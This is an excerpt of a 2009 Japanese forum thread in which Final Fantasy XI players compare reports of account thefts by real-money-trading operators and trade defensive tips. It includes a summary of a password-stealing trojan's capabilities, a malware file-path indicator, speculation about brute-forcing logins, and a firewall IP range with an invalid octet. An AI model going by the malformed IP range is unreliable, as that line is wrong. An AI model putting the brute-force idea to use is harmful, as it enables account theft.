?ファイルアップロード及びダウンロード、プロセス情報の取得,プロセス強制終了?コンソール(CMD.EXE) の実行?キーボード入力のフッキング

情報見る限り激しくこれくさいな
918既にその名前は使われています:2009/08/22(土) 04:29:23 ID:aSXNfOz5
仮に、感染していたとしても、トークンありなら一度落とされた時点で
焦って繋がなければ被害は抑えられるよな
繋がず、クリーンインストールするか、他の安全な端末
(PS2、箱○)からログインしておくだけで応急処置は出来る
その間にPCのクリーンインストール→全ての関連ソフトを最新版にする
ツールは使わない、IEも使わない

変にトークン信用できない!ってネガキャン張ってる奴をちらほら見るが
トークンの信頼度は非常に高いよ
あるとないとでは大違いだし

あとさ、ソフトのバージョンは?と聞かれて「最新版です」は答えになってない
「xx,xx,xx,xx」です、と答えてくれると分かりやすい
ハッシュ値は?と聞かれて、「○○さんと同じです」も答えになってない
「xxxxxxxxxとなり、○○さんと同じ結果です」だと分かりやすい
919既にその名前は使われています:2009/08/22(土) 05:35:43 ID:mFgOLuG3
話ぶったぎり

いつの間にかNIS2009がFirefox3.5(3.52)対応したのね
IPSもちゃんと表示されてる
920既にその名前は使われています:2009/08/22(土) 05:37:43 ID:cKbINZct
しっかしtell攻撃終わらんね
明らかに人も減ってるのに、なんでこんなに必死なのか…
スクエニも対策を考え中ですの一点張りで
このままズルズル業者を生かしておきそうだし
921既にその名前は使われています:2009/08/22(土) 06:59:01 ID:hQIk8N6a
ワリと早めにtellキャラ消してくれるGMと
延々放置するGMの差が大きくてイヤかな。
夜中〜明け方ログインしていることが多いのですが
GMは5時を境目に交代するのか
5時以降にそれまで放置だった業者が消えるし
後継ぎのキャラの処理もちゃんとしてくれることが多いです。
今日もそうでした(´・ω・`)
922既にその名前は使われています:2009/08/22(土) 07:29:24 ID:rUk472Ck
今回の垢ハク手法 画面落とさなくても 可能なんじゃね?

「スクエニ鯖とのアクセス阻害」+「パス、ワンパスを盗聴して業者サーバへ送信」

すれば良いだけってことは、1度目のログインでも、可能じゃね?

【スクリーンキーボード】で、パス入れてたら、パス抜かれなかったりして・・・と期待。
923既にその名前は使われています:2009/08/22(土) 07:38:26 ID:rUk472Ck
そろそろ、次スレなんだが、テンプレに以下追加したらどうだろ?

●パスワード入力の方法(スクリーンキーボード/手入力)
●突然、画面が落ちたか?その直後再ログインできたか?

あと、これの変更を提案。バージョン調べ方知らん人多いみたいなので。

今)●FlashPlayerとRealPlayerのバージョン:(更新日時をわかる範囲で・未導入であれば無し)
案)●FlashPlayerとRealPlayerのバージョン:(「プログラムの追加と削除」で「サポート情報を参照〜」をチェック・未導入であれば無し)
924既にその名前は使われています:2009/08/22(土) 07:45:08 ID:qU+Tj3tm
>>923
まだ確定じゃないからいらないとおもう
925870:2009/08/22(土) 07:59:44 ID:kEUp+lQZ
いろいろと為になる意見ありがとうございます。今後参考にしていきます。
幸いにもそれほど躊躇せずOS初期化に踏み切れる程度のPCなのでこれを良い機会に改めるしかないですね。
サポートにも話は伝えてあるので、復旧してもらいつつハック時の詳細も突っ込んでいきたいと思ってます。

あと、上でもさんざん書かれていますが、外部から強制切断したのち改ざんされたPOLログイン画面に誘導の流れですが、
これは体感としてはかなり納得のいくものです。
キャラ選択時に限らずゲーム内での戦闘時、移動時など外部からの干渉と思われる切断が数回ありました(ほぼ週末)。
似たような症状の方は直後にログインせずサポートに問い合わせる(さすがに手口の認識はしていると思われるので)等するのもアリかと思います。
926既にその名前は使われています:2009/08/22(土) 09:53:36 ID:1fVnEGCA
あかん、保守
927既にその名前は使われています:2009/08/22(土) 10:19:14 ID:EWGZUeyB
>>920
人が減ってるからこそ必死になってるのかも試練
顧客もカモの数も減ってるから、下手な鉄砲も数うちゃ・・・になってるんじゃないのかね
928既にその名前は使われています:2009/08/22(土) 10:27:59 ID:FWNoJpYs
今いろんな脆弱性を突かれる可能性があるから
Flash PlayerとRealPlayer以外のことも聞いたほうが良さそうな気もするんだけど
それだとどこまでいれるかの範囲が難しいよね。

初心者必読! しないと怖い「プラグイン」アップデートの方法
ttp://www.so-net.ne.jp/security/news/newstopics_200906.html
ちょっと前のだから最新のバージョンと書かれている部分はあてにならないか・・・
929既にその名前は使われています:2009/08/22(土) 10:49:56 ID:Z18fWpII
POLの通信先が分かる簡単な方法ってないのかな?
930既にその名前は使われています:2009/08/22(土) 10:53:14 ID:WsjZTAU+
>>920
世界不況と接続数減少で売れないからtell増やしてるんだろ?
かえって人減る原因だと気付かずに・・・
931既にその名前は使われています:2009/08/22(土) 11:01:57 ID:lflrrI+5
>>881
PCは素人ですが多分強制はSP2までだと思います。
SP2は流れで勝手にダウンロード始まってあせったけど
SP3は自分でしたいときにダウンロードしたので。
932既にその名前は使われています:2009/08/22(土) 11:15:44 ID:nyLzYy5C
いつまで調査すればRMTtellの対策ができるのですか
933既にその名前は使われています:2009/08/22(土) 11:18:20 ID:ef6G49Bi
ウィルスで落とされた場合はしばらく認証鯖まで繋がらないはずだから
落とされたらとりあえず適当なワンタイムパス入れて
IDか垢パスかワンタイムパスが違いますって出ることを確認できたらウィルス落ちでないと考えておk?
934既にその名前は使われています:2009/08/22(土) 11:24:10 ID:H51zMW1K
PG2のFFXI用の許可リストってあるかな
POLはネットで見つけたリストをはっつけたらインできるようになったけど
FFXIのロビーサーバー通過が無理だ
935既にその名前は使われています:2009/08/22(土) 12:18:35 ID:FqUpZVB6
外部に送信される可能性は無くなるが
許可
squareenix:61.195.480-61.195.63.255
squareenix:219.117.144.0-219.117.159.255
squareenix:202.67.48.0-202.67.63.255

FWやっとけばいいと思う
ttp://up2.viploader.net/pic2/src/viploaderf169998.png
936既にその名前は使われています:2009/08/22(土) 12:42:50 ID:xltktHHo
>>932
RMTtellが問題になってから半年近くは経つよな?
対策用の改造コードを作っているとしてもだ、やること全てが遅すぎる
発売当初から同じ料金課金してるんだがら、工数が足りないだとか
企業側の理屈述べられても甚だ迷惑だ
937既にその名前は使われています:2009/08/22(土) 12:53:55 ID:nyLzYy5C
通報しても定型文は返信してくるが、放置のまま同一キャラから複数回送信されてくることもザラにあるしな
938既にその名前は使われています:2009/08/22(土) 12:59:51 ID:H51zMW1K
>>935
ありがとう、ロビーサーバーを通過できるようになったよ
939既にその名前は使われています:2009/08/22(土) 13:07:00 ID:FWNoJpYs
窓の杜に収録していた「Glary Utilities」および「Glary Undelete」旧バージョンのウイルス感染について

両ソフトを窓の杜や作者のWebサイトからダウンロードした方は、パソコンのウイルスチェックをお願いします
ttp://www.forest.impress.co.jp/docs/info/glary_virus.html
940既にその名前は使われています:2009/08/22(土) 13:17:44 ID:qU+Tj3tm
IEユーザーの被害ばっかりだからどうせAH広告かどこかのスクリプトなんだろうが
原因がはっきりしないのは気持ち悪いな
しかしいまだにスクリプト切ってない男の人って…
941既にその名前は使われています:2009/08/22(土) 13:18:59 ID:7LlOq4Mv
>>915
>ツールはアドバンテージっていうから堂々と使ってたらこれだよ!

■e自身が製作して、使ってくださいといって配付しているものを使うならまだ解るが、それ以外が製作したもので「便利だから」出回っているもの使っている時点で、物事をまともに判断できないということを表している

昨日GM会議があったようだが、進展があればいいがね
942既にその名前は使われています:2009/08/22(土) 13:48:05 ID:7LlOq4Mv
余談
業者TellのGM対応に切れて昼にサポートセンターに電話した時、GMはバイトかと聞いてみたところ、「GMは社員」という返答を貰った
943既にその名前は使われています:2009/08/22(土) 13:49:39 ID:4KxG97Wj
SGM以外は全部バイトだと思うんだ・・・、jk
944既にその名前は使われています:2009/08/22(土) 14:01:00 ID:7LlOq4Mv
>>943
どうだろうね
ただ、社員GMなら「ログを確認することが出来る」から、すぐやらないのは何故なのだろうと思うんだがね
一回担当部署に廻します的な返答があったので、GMでもコールを受ける人と対処する人と別にしているのかもしれない
すると、情報伝達に遅滞がある、量が膨大で処理に時間が掛かる(又は処理する人間の数が少ない)、スローペースで仕事をしている
これ以外には思いつかないが
945既にその名前は使われています:2009/08/22(土) 14:03:24 ID:4KxG97Wj
>>944
GMはログ閲覧権限が無い、閲覧する時は必ずPCに時間聞くのはこのため(他の部分を勝手にみるとまずいから)

SGMはその場でログ確認する事が出来る
946既にその名前は使われています:2009/08/22(土) 14:20:54 ID:7LlOq4Mv
>>945
うーむ、それは知らなかったな
情報漏洩を極力防止する為も入っているのだろうが、末端に業者Tellログ確認権限すら与えていないというのは随分と手間の掛かることをするな
短時間で多人数に宣伝Tellを出せてしまう業者対策が後手になるどころか、報告用業者キャラリストでも作っている間に、一般プレイヤーからの通報Tellが大量に届くだけだな
947既にその名前は使われています:2009/08/22(土) 15:00:22 ID:jz9ek56H
整理しやすくするための定型フォームなんだろう。
948既にその名前は使われています:2009/08/22(土) 15:29:24 ID:EK5mm3Z+
何でSTFじゃなくGMにtell業者報告するの?担当部署違うじゃろに。
949既にその名前は使われています:2009/08/22(土) 15:41:37 ID:wWbrdgAP
>>942
コールセンターでは「おまえは社員か」と聞かれたら
バイトだろうと「社員」と答えるよう教育されているのは、
業界では常識。「バイトです^^;」と答えてしまうやつは、
その後の客の反応(話にならん。上席を出せetc)を予想
できない役立たず。
950既にその名前は使われています:2009/08/22(土) 15:43:38 ID:xltktHHo
>>944
>すると、情報伝達に遅滞がある、量が膨大で処理に時間が掛かる(又は処理する人間の数が少ない)、スローペースで仕事をしている
>これ以外には思いつかないが

100歩譲って、関連する垢を全て洗い出してる
951既にその名前は使われています:2009/08/22(土) 15:47:49 ID:98SGeAd5
ちょっと急ぎでカコレスよんでないけど
トークンありでもハックされて装備とギル取られた人がいるんだけど
トークンありでハックされた事例の報告このすれにある?
952既にその名前は使われています:2009/08/22(土) 16:04:09 ID:EK5mm3Z+
トークン有りなら3人位いたかな。いずれもIE使いだったよーな。
953既にその名前は使われています:2009/08/22(土) 16:05:59 ID:wWbrdgAP
トークンあり、ブラウザFirefox3.1でレイプされたのがいるな。
ツーラーだけど。ほんとツーラー死んでくれ。
954既にその名前は使われています:2009/08/22(土) 16:06:42 ID:4KxG97Wj
IE(しかもなぜか6)使いだし、バージョン聞いたら数字書かず「最新」だし、社内PCでFFやってたり

問題外じゃない
955既にその名前は使われています:2009/08/22(土) 16:10:22 ID:4nHnKmTM
>951
いるみたいだけどみんなお前みたいにテンプレの回答すらろくにできない事例ばっかりで役に立たない
956既にその名前は使われています:2009/08/22(土) 16:18:08 ID:mXadZ9rl
>>661あたり参照
957既にその名前は使われています:2009/08/22(土) 16:19:51 ID:mXadZ9rl
ツラーとは限らないから次スレのテンプレにいれるなら>>614
958既にその名前は使われています:2009/08/22(土) 16:25:57 ID:4KxG97Wj
まだ、何も解明されてないのにテンプレにいれてどうすんだって言う
959既にその名前は使われています:2009/08/22(土) 17:23:01 ID:xltktHHo
書く項目が無駄に多いテンプレも間抜けだよな

時々、書き手の手間を無視したアホ会社に見かけるけど
やたら記入項目が多いアンケートみたいなもんで、書いてるうちにダルくなって、
回答がテキトーになる
960既にその名前は使われています:2009/08/22(土) 17:25:34 ID:aOk9okQC
ハックの原因として確定してるわけでもないし、まだテンプレとして増やすというより
個別に聞くレベルでいいと思うけどなー
961既にその名前は使われています:2009/08/22(土) 17:29:10 ID:zlLS6j1F
次スレ立てる時の注意はRMTって部分を半角のRMTってすることかね?
962既にその名前は使われています:2009/08/22(土) 17:33:43 ID:aOk9okQC
俺は昔のスレタイが好きなんだけど、趣旨がどうのって話だから、
RMT半角+●と文字の間に半角スペースで

●● RMT業者の垢ハック報告・監視スレ52 ●●

って感じかね。
正確には50が落ちてここが50の代わりなんだけど、ここが完走できりゃ52でいいか。
970から980くらいの人でスレ建て宣言してから試してくれー
963既にその名前は使われています:2009/08/22(土) 18:07:51 ID:3otSlA0D
ちょっとシャレならんので報告
●気付いた日時:8/22 0:45頃
●不審なアドレスのクリックの有無:無 AHも一度も廻覧したことがない
●他人が貴方のIDを使用したことが一度でもあるか:NO
●ID・Passの認証方法:OTP
●Pass変更の履歴:トークン導入時
●他人が貴方のPCを使う可能性の有無:NO
●ツールの使用の有無:NO
●ネットカフェの利用の有無:NO
●使っているOS:XPSP3
●使用ブラウザ:FireFox3.5.2
●WindowsUpdateの有無:2009/8/14 月次アップデータまで終了
●FlashPlayerとRealPlayerのバージョン:10.0.32.18 Realはインストしていません
●アンチウイルスソフト状況:AVG8.5.375 パターンは毎日更新
●その他のセキュリティ対策:Spybot ブラウザのアドオンはnoscript,adblockplus導入 
●ウイルススキャン結果:AVG及びカスペオンラインで何も発見できず
●スレログやテンプレを読んだか:昔から見てます
●hosts変更:spybotの定期パッチ及び手動で危険ドメイン登録
●PeerGuardian2の導入:有 リネ資料室のリスト及び中韓台の3国リスト随時更新
●その他情報・症状など:pol.exe 564d8a1a3d91d373b5d9e6271fb9a0aa  続く
964既にその名前は使われています:2009/08/22(土) 18:09:41 ID:3otSlA0D
つづいた

昨夜POLのFFTOPで放置して裏で作業してたんだが、
寝ようと重い0:45頃POL画面をみると、例の「他の端末からアクセスがあったため云々〜」
のメッセージとともに回線切断されていた。
すぐさまプロセス確認するも、見慣れないプロセスもなく
一度POL終了後、再起動しログイン。OTPも普通に通り、キャラも無事。
最終ログイン時間は0:26になっていた(自分がログインしたのは20:40、ログインの度記録しているので間違いない)
その後すぐさまカスペオンラインスキャンとAVGでスキャンを続けて行ったがなにも発見できず
現在に至るまでPOLはログインしたままにしておいたが、その後何事もなく今に至ってる感じ。
穴がわからないため逆に怖くてクリーンインスコできない状況w
調査以来しようとPOLでGM呼んだら、専用窓口でよろって定型文送ってきたんだけど、窓口しまってるww
週明けまでPOLインしたまま様子見てみる
965既にその名前は使われています:2009/08/22(土) 18:18:13 ID:bcTDmcrS
2週間ぶりにログインしようとしたらパスワード違うって弾かれました
多分ハックされていると思います。 以下私の環境
●気付いた日時:2009/08/22 15時
●不審なアドレスのクリックの有無 
ttp://www○ddlbee○com/ DQ9の事調べててうっかり踏んづけたような記憶がある
AHは此処3年位FF用のPCでは見ていない
●他人が貴方のIDを使用したことが一度でもあるか:No
●ID・Passの認証方法:ワンタイム無、約2年前から自動ログイン→Pass手打ちに変更、その時にPassも変更
●他人が貴方のPCを使う可能性の有無:無し
●ツールの使用の有無:一切なし
●ネットカフェの利用の有無:ここ2年くらいは無い
●使っているOS:XP SP3
●使用ブラウザ:IE6.0.2900.5512.xpsp_sp3_gdr.090206-1234
●WindowsUpdateの有無:最終更新はおそらく8/11 以降今日まで帰省でPC触ってなかった
●FlashPlayerとRealPlayerのバージョン:FlashPlayer:10.0.22.87 RealPlayer:11.1.3
●POLハッシュ:564d8a1a3d91d373b5d9e6271fb9a0aa
●アンチウイルスソフト状況:NortonInternetSecurity(PCプリインストール90日版)
              最後の完全スキャンが8/11の23時
続きます
966既にその名前は使われています:2009/08/22(土) 18:20:18 ID:bcTDmcrS
つづき
●ウイルススキャン結果:カスペルスキーオンラインスキャン実行中
●スレログやテンプレを読んだか:このスレの800〜位から
●hosts変更:未調査
●PeerGuardian2の導入:無
●その他情報・症状など:
最近PC買い換えて使用開始1月も経っていません。
旧PCはFFアンインストールして処分してしまったので
旧PCの詳細情報は分からず。IE6使用で,Flashもおそらく非最新、ってこと位でしょうか。
そっちのPC使ってたときに抜かれてると上記情報は役立たずですが、
環境はほぼ同じ。必要であれば分かる範囲で答えます。

正直ワンタイム無くても別に取られたらその時、程度に思ってたのでこれから導入予定す
悲観はしてないけど危機感無さ杉だよなぁ俺。
967既にその名前は使われています:2009/08/22(土) 18:45:19 ID:4KxG97Wj
>>965
取り合えず下のがあるか調べてくれ

C:\Windows \ime\wmimachine2.dll (98,304 Byte)
968既にその名前は使われています:2009/08/22(土) 18:54:03 ID:bcTDmcrS
>>967
このPCには、無いようだ
旧PCの方は、残念ながら分からない
969既にその名前は使われています:2009/08/22(土) 18:55:47 ID:4KxG97Wj
>>968
そうかわざわざありがとう、昨今は亜種出るの速いし一度入ったら痕跡消すのもいるからな・・・

手掛かりが見つかればラボなげて解析させるだけでいいんだが
970既にその名前は使われています:2009/08/22(土) 19:24:05 ID:y1kJW8ID
>963-964
パス抜かれたけど、OTPあったから助かった例に見えるが
971既にその名前は使われています:2009/08/22(土) 19:27:03 ID:zlLS6j1F
なんかここんトコ多くて怖いな。
ちとスレ立てチャレンジしてくる。
972既にその名前は使われています:2009/08/22(土) 19:29:05 ID:zlLS6j1F
うおおおお…スレ立て無理でした。
誰か頼む。
タイトルを>>962にある半角にしてくれると嬉しい。
973既にその名前は使われています:2009/08/22(土) 19:36:33 ID:wWbrdgAP
新しいウィルス?がばらまかれてるのは間違いなさそうだね。
正直プラグイン最新、トークン、Firefox+NoScriptでもだめとか
になると、自衛手段が思い浮かばないんだが(俺PS2だけどナー)

テンプレ通り報告しないアホは、遅かれ早かれハックされてたろうから
どうでもいいけど、しっかり意識してた人までやられていくのが
かわいそうすぎる・・。
974既にその名前は使われています:2009/08/22(土) 19:37:12 ID:3otSlA0D
>>970
うん、それは自分でもわかってるんだけど
一体いつどこでどのタイミングでパス抜きトラップ踏んだのか
まったく見当がつかないので怖いんだわー
975既にその名前は使われています:2009/08/22(土) 19:39:27 ID:aOk9okQC
>>973
今のとこ火狐ノースクリプトで被害に遭ってる奴はいない
963のはIDパスまで入力されてるけどOTPが違うからハック側もログインはできてないタイプ
976既にその名前は使われています:2009/08/22(土) 19:40:56 ID:hPF7PraB
>>963
たぶんPOLIDとPOLパスはリンクシェルコミュニィティから分かったんじゃない?

あのLSコミュサイトって未だに何回でもパス入力受け付けられてるよね?
総当りツール使えばいずれ任意のIDのパスは判明するんだし、
フィッシングサイトにも利用されてるんだから閉鎖して欲しいんだが。
977既にその名前は使われています:2009/08/22(土) 19:42:07 ID:mXadZ9rl
●● RMT業者の垢ハック報告・監視スレ52 ●●
http://dubai.2ch.net/test/read.cgi/ogame/1250937549/
978既にその名前は使われています:2009/08/22(土) 19:42:50 ID:aOk9okQC
>>977
おつポニテ
979既にその名前は使われています:2009/08/22(土) 19:42:51 ID:wWbrdgAP
>>975
ID:3otSlA0Dな人がまさにソレじゃない?
どういう理由か、他端末でインはされたものの、被害はなかったってだけで、
運が良かった、、だけではないのか?
俺もしかして文盲?
980既にその名前は使われています:2009/08/22(土) 19:46:38 ID:U1bJOIY3
タイトルのアルファベットは半角で頼む!
981既にその名前は使われています:2009/08/22(土) 19:48:11 ID:3otSlA0D
>>976
リンクシェルコミュニティで総当りしてPOLIDとPASS割れるなら
トークン未導入の人は全員ハクられることにならない?
982既にその名前は使われています